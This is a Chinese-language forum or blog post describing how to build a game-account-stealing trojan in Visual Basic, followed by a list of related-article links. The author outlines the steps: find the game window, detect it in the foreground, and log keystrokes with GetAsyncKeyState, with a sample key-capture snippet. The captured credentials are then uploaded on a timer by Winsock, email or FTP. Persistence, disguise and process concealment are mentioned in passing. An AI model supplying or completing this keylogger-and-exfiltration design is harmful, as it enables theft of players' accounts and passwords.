VB全局HOOK写游戏盗号木马
思路:
1、用spy++工具获取目标游戏窗体句柄
2、使用timer控件检测句柄是否为当前窗口
3、帐号密码获取:使用全局HOOK键盘记录
4、发送....(这步方法很多,也是最难的一部分,本人采用winsock控件实现的,这里不详细说了,嘿嘿怕你做出木马,说是我教的)
现在详细说下每步:
1、不多说了,使用visual studio自带的工具,幼儿园操作。
2、也不说了,用到几个API函数(GetForegroundWindow、 FindWindow、 GetWindowTextLength、GetForegroundWindow) 啊?怎么做? 自己查API字典去,里面说的很清楚。
3、其实也不是获取,只是开启游戏后用一个if语句判断是否检测到目标游戏,如果是则启动键盘记。
至于键盘记录:使用API(GetAsyncKeyState //也许用GetKeyState速度会快些)实现,再新建一个timer控件,在里面写入所有键值判断语句,例:
'键a----------------------------------------------------------------------------------------------------------------------------------
dim pkey as long '定义一个key
pkey = GetAsyncKeyState(vbKeyA)
If (pkey And &H1) = &H1 Then '键是否按下
If (CapsLock = 1 And Shift = 0) Or (CapsLock = 0 And Shift <> 0) Then '大小写判断的方法!!!
a.Text = a.Text + "A"
End If
If (CapsLock = 1 And Shift <> 0) Or (CapsLock = 0 And Shift = 0) Then
a.Text = a.Text + "a"
End If
End If
'----------------------------------------------------------------------------------------------------------------------------------------
'.................额,漫长的代码开始了.........
当然同样差不多的方法你可以获取capslock和shift的状态....由于篇幅不详细写了
最后些一个定时上传,同样使用timer控件里面写入发送程序...发送有很多方法...邮件\FTP\.........
至于那些使用密保卡的帐号,暂时还没有办法.....考虑中
当然一个木马,还有其他部分,这里不说了,比如路径,欺骗性,进程,开机启动........等等(看你怎么想做什么样的)
谢谢,共享心得完毕,希望对你学习有帮助...个人觉得还是用C++写好,唉恨铁不成钢啊,有想法欢迎留言讨论,或联系本QQ!!365130596
VB全局HOOK写游戏盗号木马相关推荐
- VB 全局Hook鼠标消息
VB 全局Hook鼠标钩子,获取鼠标单击左键.鼠标坐标位置等. 以下是鼠标的按键消息: 键 按下 释放 按下(双击) 左 WM_NCLBUTTONDOWN=&HA1 WM_NCLBUTTONU ...
- VB 全局热键HOOK (不占系统资源版本)
VB 全局热键HOOK (不占系统资源版本) 看过网上很多的全局热键的写法,几乎都用 do loop 写,很占资源. 这个是占很少资源的 全局热键. Option Explicit Private D ...
- 网络安全之盗号木马原理
网络安全之盗号木马原理 现在,腾讯在中国几亿的QQ用户,经常会听到身边的人说:我QQ号被盗了.前几天旁边的同事有朋友给他打电话说他的QQ在向人发借钱的信息. 昨天和一同学吃饭,因为这位同学在某家培训机 ...
- 一款魔兽盗号木马分析
这款魔兽盗号木马是模仿"多玩魔兽盒子"欺骗用户从而进行盗号的,请看"多玩魔兽盒子"官方网站:http://wow.duowan.com/wowbox1/, 木马 ...
- vb全局热键的写法(占很少的资源)
看过网上很多的全局热键的写法,几乎都用 do loop 写,很占资源. 这个是占很少资源的 全局热键. -----------在窗体------------------- 程序代码: Private ...
- 2020年 IOS 逆向 反编译 注入修改游戏或APP的调用参数新手系列教程——使用theos tweak 注入hook修改游戏执行代码上传动态头像
2020年 IOS 逆向 反编译 注入修改游戏或APP的调用参数新手系列教程--使用theos tweak 注入hook修改游戏执行代码上传动态头像 开篇 需求&最终效果 环境要求与即将使用的 ...
- 隔离幻想游戏的木马广告
幻想游戏的木马广告 最近,很多幻想游戏都捆绑了一个叫作Captiv8的广告发布系统,在游戏的安装目录里可以看到很多以c8开头的文件.c8具备自动更新程序的功能.目前它也许只是收集用户信息.自动下载广告 ...
- 再战Trojan.PSW.Lmir.kuo、Trojan.PSW.Misc.kcc等网游盗号木马(第2版)
endurer 原创 2006-08-13 第2版 补充一个漏网的 2006-08-12 第1版 今早一上网,就有网友求助.他电脑屏幕右下角的瑞星实时监控小伞图标不见了,手动启动也不行. 通过QQ远程 ...
- ChinaJoy揭晓十大网游盗号木马黑榜
7月12日,第5届ChinaJoy游戏展在上海拉开帷幕,为网游爱好者奉献了一场精彩的饕餮大餐.而在网络游戏已经成为一种时尚的今天,网游盗号问题也随之愈演愈烈,屡禁不止.很多游戏玩家也因此蒙受了严重的损 ...
最新文章
- 澎思科技马原:AI安防竞争还未结束,落地进入后发优势时代 | MEET2020
- nginx thinkphp 配置pathinfo
- 用户控件(.ascx)调用网页(.aspx)的方法
- stdio.h iostream.h iostream 三者
- 内存属于linux文件吗,linux下的/dev/shm是什么? 内存 文件系统
- 程序员应该知道的一些很cool网站
- 智能续航兼得的“超能代表”OPPO Watch 2系列正式发布
- slotformatcombinations_R15 38.331 无线资源控制(RRC)协议规范.pdf
- React 毁了 Web 开发?
- Oracle VM VirtualBox 无法卸载 更新 和修复
- 福州大学数学与计算机科学学院 地址,福州大学数学与计算机科学学院导师介绍:陈神灿...
- 树莓派4B之雨滴雨水传感器模块(python3)
- GreenPlum常用数值计算函数
- Ubuntu17.04系统安装必备软件与存在的问题
- java在浏览器打开word,如何直接在浏览器中打开word文档
- ettercap局域网DNS欺骗实现过程
- 网络繁杂,我们该如何准确获取所需信息?
- WCF 第五章 行为 实现自定义行为
- 为知笔记和微信高保真原型
- android 动画方式,Android Activity进出动画三种方法